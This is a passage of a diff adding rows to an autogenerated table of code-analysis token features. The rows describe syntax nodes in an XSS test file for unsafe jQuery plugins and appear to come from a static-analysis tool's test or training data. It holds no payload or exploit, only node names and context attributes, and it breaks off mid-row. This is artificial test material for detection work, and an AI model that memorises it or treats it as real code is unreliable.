| contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | $.exten ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | $.exten ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | exceptional return of $.exten ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | exceptional return of $.exten ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | exceptional return of $.exten ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | exceptional return of $.exten ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:26:67:31 | extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:26:67:31 | extend | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:26:67:31 | extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:26:67:31 | extend | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:33:67:34 | {} | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:33:67:34 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:33:67:34 | {} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23827,42 +155536,546 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:37:67:43 | options | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:37:67:43 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:37:67:43 | options | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:10 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:10 | this | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:10 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:10 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:18 | this.options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:18 | this.options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:18 | this.options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:18 | this.options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:25 | this.options.parent | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:25 | this.options.parent | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:25 | this.options.parent | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:7:68:25 | this.options.parent | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:12:68:18 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:12:68:18 | options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:12:68:18 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:12:68:18 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:20:68:25 | parent | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:20:68:25 | parent | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:20:68:25 | parent | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:20:68:25 | parent | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:31 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:31 | this | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:31 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:31 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:39 | this.$parent | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:39 | this.$parent | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:39 | this.$parent | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:39 | this.$parent | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:64 | this.$p ... parent) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:64 | this.$p ... parent) | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:64 | this.$p ... parent) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:28:68:64 | this.$p ... parent) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:33:68:39 | $parent | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:33:68:39 | $parent | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:33:68:39 | $parent | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:33:68:39 | $parent | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:43 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:43 | $ | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:43 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:43 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | $(this. ... parent) | assignedToPropName | $parent | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | $(this. ... parent) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | $(this. ... parent) | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | $(this. ... parent) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | $(this. ... parent) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | exceptional return of $(this. ... parent) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | exceptional return of $(this. ... parent) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | exceptional return of $(this. ... parent) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:43:68:64 | exceptional return of $(this. ... parent) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:48 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:48 | this | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:48 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:48 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:56 | this.options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:56 | this.options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:56 | this.options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:56 | this.options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | contextSurroundingFunctionParameters | ()\n(element, options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:50:68:56 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:50:68:56 | options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:50:68:56 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:50:68:56 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:58:68:63 | parent | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:58:68:63 | parent | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:58:68:63 | parent | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:68:58:68:63 | parent | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:71:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:74:2 | $.fn.my ... / OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:74:2 | $.fn.my ... / OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:74:2 | $.fn.my ... / OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:2:74:2 | $.fn.my ... / OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:4:71:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:4:71:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:4:71:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:4:71:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:7:71:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:7:71:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:7:71:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:7:71:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:71:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:71:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:71:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:71:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, 